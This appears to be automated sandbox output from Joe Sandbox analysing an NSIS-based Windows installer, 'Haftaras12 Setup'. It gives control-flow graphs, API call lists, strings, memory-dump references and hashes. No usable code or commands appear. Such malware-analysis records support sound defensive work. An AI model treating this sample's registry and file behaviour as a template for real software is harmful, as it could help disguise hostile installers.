                                        control_flow_graph 451 406320-40632b 452 40632d-40633c 451->452 453 40633e-406353 451->453 452->453 454 406564-406568 453->454 455 406359-406364 453->455 456 406376-406380 454->456 457 40656e-406578 454->457 455->454 458 40636a-406371 455->458 456->457 461 406386-40638d 456->461 459 406583-406584 457->459 460 40657a-40657e call 40628d 457->460 458->454 460->459 463 406393-4063c9 461->463 464 406557 461->464 467 406501-406504 463->467 468 4063cf-4063d9 463->468 465 406561-406563 464->465 466 406559-40655f 464->466 465->454 466->454 469 406534-406537 467->469 470 406506-406509 467->470 471 4063f6 468->471 472 4063db-4063e4 468->472 476 406545-406555 lstrlenA 469->476 477 406539-406540 call 406320 469->477 474 406519-406525 call 40628d 470->474 475 40650b-406517 call 4061eb 470->475 473 4063fd-406405 471->473 472->471 478 4063e6-4063e9 472->478 480 406407 473->480 481 40640e-406410 473->481 489 40652a-406530 474->489 475->489 476->454 477->476 478->471 479 4063eb-4063ee 478->479 479->471 485 4063f0-4063f4 479->485 480->481 486 406412-40642d call 406174 481->486 487 406447-40644a 481->487 485->473 494 406432-406435 486->494 492 40644c-406458 GetSystemDirectoryA 487->492 493 40645d-406460 487->493 489->476 491 406532 489->491 495 4064f9-4064ff call 406587 491->495 496 4064e3-4064e6 492->496 497 406471-406474 493->497 498 406462-40646e GetWindowsDirectoryA 493->498 501 4064e8-4064ec 494->501 502 40643b-406442 call 406320 494->502 495->476 496->495 496->501 497->496 500 406476-406494 497->500 498->497 504 406496-406499 500->504 505 4064ab-4064c3 call 4066b5 500->505 501->495 507 4064ee-4064f4 lstrcatA 501->507 502->496 504->505 508 40649b-40649f 504->508 514 4064c5-4064d8 SHGetPathFromIDListA CoTaskMemFree 505->514 515 4064da-4064e1 505->515 507->495 512 4064a7-4064a9 508->512 512->496 512->505 514->496 514->515 515->496 515->500
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406452
                                        • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00000000), ref: 00406468
                                        • SHGetPathFromIDListA.SHELL32(00000000,Call,?,T@,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000), ref: 004064C7
                                        • CoTaskMemFree.OLE32(00000000,?,T@,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000), ref: 004064D0
                                        • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000), ref: 004064F4
                                        • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00000000,00424440,757B23A0), ref: 00406546
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                        • String ID: T@$Call$Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 4024019347-3128861464
                                        • Opcode ID: d0ff790806609fa8110423ddf0d31832cd3c7fba7b22f484d1795f71742cc0e8
                                        • Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
                                        • Opcode Fuzzy Hash: d0ff790806609fa8110423ddf0d31832cd3c7fba7b22f484d1795f71742cc0e8
                                        • Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 585 40177e-4017a1 call 402c5e call 405c8c 590 4017a3-4017a9 call 40628d 585->590 591 4017ab-4017bd call 40628d call 405c1f lstrcatA 585->591 596 4017c2-4017c8 call 406587 590->596 591->596 601 4017cd-4017d1 596->601 602 4017d3-4017dd call 406620 601->602 603 401804-401807 601->603 610 4017ef-401801 602->610 611 4017df-4017ed CompareFileTime 602->611 605 401809-40180a call 405dfb 603->605 606 40180f-40182b call 405e20 603->606 605->606 613 4018a3-4018cc call 4053d1 call 403168 606->613 614 40182d-401830 606->614 610->603 611->610 627 4018d4-4018e0 SetFileTime 613->627 628 4018ce-4018d2 613->628 616 401832-401874 call 40628d * 2 call 406320 call 40628d call 4059a3 614->616 617 401885-40188f call 4053d1 614->617 616->601 648 40187a-40187b 616->648 629 401898-40189e 617->629 631 4018e6-4018f1 FindCloseChangeNotification 627->631 628->627 628->631 632 402af3 629->632 635 4018f7-4018fa 631->635 636 402aea-402aed 631->636 634 402af5-402af9 632->634 638 4018fc-40190d call 406320 lstrcatA 635->638 639 40190f-401912 call 406320 635->639 636->632 645 401917-4023af 638->645 639->645 649 4023b4-4023b9 645->649 650 4023af call 4059a3 645->650 648->629 651 40187d-40187e 648->651 649->634 650->649 651->617
                                        APIs
                                        • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Storfyrstindes,00000000,00000000,00000031), ref: 004017BD
                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Storfyrstindes,00000000,00000000,00000031), ref: 004017E7
                                          • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,Haftaras12 Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00424440,757B23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00424440,757B23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                          • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00424440,757B23A0), ref: 0040542D
                                          • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll), ref: 0040543F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp$C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Storfyrstindes$Call
                                        • API String ID: 1941528284-4082682155
                                        • Opcode ID: 0acf61fd71f3edde6b321a3403c7c5eac4b41d6d52f200133c1c8b0501db61a2
                                        • Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
                                        • Opcode Fuzzy Hash: 0acf61fd71f3edde6b321a3403c7c5eac4b41d6d52f200133c1c8b0501db61a2
                                        • Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 652 4053d1-4053e6 653 40549c-4054a0 652->653 654 4053ec-4053fe 652->654 655 405400-405404 call 406320 654->655 656 405409-405415 lstrlenA 654->656 655->656 658 405432-405436 656->658 659 405417-405427 lstrlenA 656->659 661 405445-405449 658->661 662 405438-40543f SetWindowTextA 658->662 659->653 660 405429-40542d lstrcatA 659->660 660->658 663 40544b-40548d SendMessageA * 3 661->663 664 40548f-405491 661->664 662->661 663->664 664->653 665 405493-405496 664->665 665->653
                                        APIs
                                        • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00424440,757B23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                        • lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00424440,757B23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                        • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00424440,757B23A0), ref: 0040542D
                                        • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll), ref: 0040543F
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll
                                        • API String ID: 2531174081-1573931892
                                        • Opcode ID: 04eedc2ba923f0a8d7eb9848a27cab945aaff25bd16a1fb9afb004099d42d10e
                                        • Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
                                        • Opcode Fuzzy Hash: 04eedc2ba923f0a8d7eb9848a27cab945aaff25bd16a1fb9afb004099d42d10e
                                        • Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 666 403168-40317c 667 403185-40318e 666->667 668 40317e 666->668 669 403190 667->669 670 403197-40319c 667->670 668->667 669->670 671 4031ac-4031b9 call 40337a 670->671 672 40319e-4031a7 call 403390 670->672 676 403368 671->676 677 4031bf-4031c3 671->677 672->671 678 40336a-40336b 676->678 679 403313-403315 677->679 680 4031c9-403212 GetTickCount 677->680 683 403373-403377 678->683 681 403355-403358 679->681 682 403317-40331a 679->682 684 403370 680->684 685 403218-403220 680->685 689 40335a 681->689 690 40335d-403366 call 40337a 681->690 682->684 686 40331c 682->686 684->683 687 403222 685->687 688 403225-403233 call 40337a 685->688 692 40331f-403325 686->692 687->688 688->676 700 403239-403242 688->700 689->690 690->676 698 40336d 690->698 695 403327 692->695 696 403329-403337 call 40337a 692->696 695->696 696->676 703 403339-403345 call 405ec7 696->703 698->684 702 403248-403268 call 4067da 700->702 708 40330b-40330d 702->708 709 40326e-403281 GetTickCount 702->709 710 403347-403351 703->710 711 40330f-403311 703->711 708->678 712 403283-40328b 709->712 713 4032c6-4032c8 709->713 710->692 716 403353 710->716 711->678 717 403293-4032be MulDiv wsprintfA call 4053d1 712->717 718 40328d-403291 712->718 714 4032ca-4032ce 713->714 715 4032ff-403303 713->715 720 4032d0-4032d7 call 405ec7 714->720 721 4032e5-4032f0 714->721 715->685 722 403309 715->722 716->684 723 4032c3 717->723 718->713 718->717 726 4032dc-4032de 720->726 725 4032f3-4032f7 721->725 722->684 723->713 725->702 727 4032fd 725->727 726->711 728 4032e0-4032e3 726->728 727->684 728->725
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: ... %d%%$@DB
                                        • API String ID: 551687249-1316549817
                                        • Opcode ID: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                                        • Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
                                        • Opcode Fuzzy Hash: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                                        • Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 729 406647-406667 GetSystemDirectoryA 730 406669 729->730 731 40666b-40666d 729->731 730->731 732 40667d-40667f 731->732 733 40666f-406677 731->733 735 406680-4066b2 wsprintfA LoadLibraryExA 732->735 733->732 734 406679-40667b 733->734 734->735
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                        • wsprintfA.USER32 ref: 00406697
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%s.dll$UXTHEME$\
                                        • API String ID: 2200240437-4240819195
                                        • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                        • Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
                                        • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                        • Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 736 402d60-402d89 call 406113 738 402d8e-402d92 736->738 739 402e43-402e47 738->739 740 402d98-402d9c 738->740 741 402dc1-402dd4 740->741 742 402d9e-402dbf RegEnumValueA 740->742 744 402dfd-402e04 RegEnumKeyA 741->744 742->741 743 402e28-402e36 RegCloseKey 742->743 743->739 745 402dd6-402dd8 744->745 746 402e06-402e18 RegCloseKey call 4066b5 744->746 745->743 748 402dda-402dee call 402d60 745->748 751 402e38-402e3e 746->751 752 402e1a-402e26 RegDeleteKeyA 746->752 748->746 754 402df0-402dfc 748->754 751->739 752->739 754->744
                                        APIs
                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CloseEnum$DeleteValue
                                        • String ID:
                                        • API String ID: 1354259210-0
                                        • Opcode ID: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                        • Instruction ID: 6dce0a33df475c695949d28520f5422678f12aee2cc84e9e423a55bf09ef2c56
                                        • Opcode Fuzzy Hash: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                        • Instruction Fuzzy Hash: 3B215C7250010CBBDF129F90CE89EEF7B6DEB44344F100076FA15B11A0E7B48F54AAA8

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 755 6c60176b-6c6017a7 call 6c601b28 759 6c6018c4-6c6018c6 755->759 760 6c6017ad-6c6017b1 755->760 761 6c6017b3-6c6017b9 call 6c60233f 760->761 762 6c6017ba-6c6017c7 call 6c602381 760->762 761->762 767 6c6017f7-6c6017fe 762->767 768 6c6017c9-6c6017ce 762->768 769 6c601800-6c60181c call 6c602568 call 6c6015e9 call 6c6012f6 GlobalFree 767->769 770 6c60181e-6c601822 767->770 771 6c6017d0-6c6017d1 768->771 772 6c6017e9-6c6017ec 768->772 795 6c601873-6c601877 769->795 773 6c601824-6c60186a call 6c6015fb call 6c602568 770->773 774 6c60186c-6c601872 call 6c602568 770->774 777 6c6017d3-6c6017d4 771->777 778 6c6017d9-6c6017da call 6c602ac8 771->778 772->767 775 6c6017ee-6c6017ef call 6c602d53 772->775 773->795 774->795 789 6c6017f4 775->789 783 6c6017e1-6c6017e7 call 6c602742 777->783 784 6c6017d6-6c6017d7 777->784 786 6c6017df 778->786 794 6c6017f6 783->794 784->767 784->778 786->789 789->794 794->767 798 6c6018b4-6c6018bb 795->798 799 6c601879-6c601887 call 6c60252e 795->799 798->759 802 6c6018bd-6c6018be GlobalFree 798->802 805 6c601889-6c60188c 799->805 806 6c60189f-6c6018a6 799->806 802->759 805->806 808 6c60188e-6c601896 805->808 806->798 807 6c6018a8-6c6018b3 call 6c601572 806->807 807->798 808->806 809 6c601898-6c601899 FreeLibrary 808->809 809->806
                                        APIs
                                          • Part of subcall function 6C601B28: GlobalFree.KERNEL32(?), ref: 6C601D99
                                          • Part of subcall function 6C601B28: GlobalFree.KERNEL32(?), ref: 6C601D9E
                                          • Part of subcall function 6C601B28: GlobalFree.KERNEL32(?), ref: 6C601DA3
                                        • GlobalFree.KERNEL32(00000000), ref: 6C601816
                                        • FreeLibrary.KERNEL32(?), ref: 6C601899
                                        • GlobalFree.KERNEL32(00000000), ref: 6C6018BE
                                          • Part of subcall function 6C60233F: GlobalAlloc.KERNEL32(00000040,?), ref: 6C602370
                                          • Part of subcall function 6C602742: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6C6017E7,00000000), ref: 6C602812
                                          • Part of subcall function 6C6015FB: wsprintfA.USER32 ref: 6C601629
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86267191150.000000006C601000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C600000, based on PE: true
                                        • Associated: 00000000.00000002.86267155201.000000006C600000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000000.00000002.86267225002.000000006C604000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000000.00000002.86267260674.000000006C606000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c600000_004552024107.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                        • String ID:
                                        • API String ID: 3962662361-3916222277
                                        • Opcode ID: fe6b8b30473a07e6e4c0d7779644df433cae3c89d88f243f1ec096081d66aad8
                                        • Instruction ID: 8d3fc25bfde95d5645075052ccd1795663a6aee4b5024ba734647dd6967c2f9d
                                        • Opcode Fuzzy Hash: fe6b8b30473a07e6e4c0d7779644df433cae3c89d88f243f1ec096081d66aad8
                                        • Instruction Fuzzy Hash: A141CE717002049ADB0D9F658BC8BDA37E8BF0231DF148429E916BA982DB74C649C7AC

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 812 4024a3-4024ca call 402c5e * 2 call 402cee 818 4024cf-4024d4 812->818 819 402aea-402af9 818->819 820 4024da-4024e4 818->820 821 4024f4-4024f7 820->821 822 4024e6-4024f3 call 402c5e lstrlenA 820->822 826 4024f9-40250d call 402c3c 821->826 827 40250e-402511 821->827 822->821 826->827 830 402522-402536 RegSetValueExA 827->830 831 402513-40251d call 403168 827->831 834 402538 830->834 835 40253b-402618 RegCloseKey 830->835 831->830 834->835 835->819
                                        APIs
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,00000023,00000011,00000002), ref: 004024EE
                                        • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,00000000,00000011,00000002), ref: 0040252E
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,00000000,00000011,00000002), ref: 00402612
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CloseValuelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp
                                        • API String ID: 2655323295-1836902777
                                        • Opcode ID: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
                                        • Instruction ID: bcff8488b3c7483af384f27edc247fb8d09a012b63b7e061f1957b9ca53072ec
                                        • Opcode Fuzzy Hash: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
                                        • Instruction Fuzzy Hash: A5118172E04118BFEF10AFA59E49AAE7AB4EB44314F20443FF505F71D1C6B98D829A18

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
